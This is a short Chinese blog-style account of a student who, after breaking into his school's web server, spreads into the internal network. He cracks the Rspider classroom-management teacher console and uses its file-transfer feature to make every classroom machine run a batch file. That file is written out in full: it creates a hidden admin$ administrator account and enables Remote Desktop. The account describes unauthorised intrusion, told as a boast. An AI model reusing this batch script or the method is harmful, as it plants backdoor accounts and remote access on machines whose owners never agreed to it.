00×01

在经过二次渗透拿下官网服务器的权限后，作为“好学生“的我就把魔爪对准了内网~~~

首先，从教室开始入口吧- -#

00×02

首先需要卸载原来 Rspider 中的学生端：

 

然后在安装教师机：

 

安装完成后是不可以打开的，所以需要先使用破解补丁替换 monitor 与 Rspider 文件，出现下图表示就是可以使用了。

 

 

可以看见，这里有多少个就代表着有多少个开机 。

 

选择文件传输，当然前提我们需要先准备好一个bat文件 。

内容：

net user admin$ qwe123!@# /add

net localgroup administrators admin$ /add

REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 0 /f

意义就是添加一个 admin$ 用户，然后添加到用户组，然后在开启 3389

 

注意，要让他直接运行才可以！

传送成功，那么就可以登录服务器了。

我就不一台台登录了~~~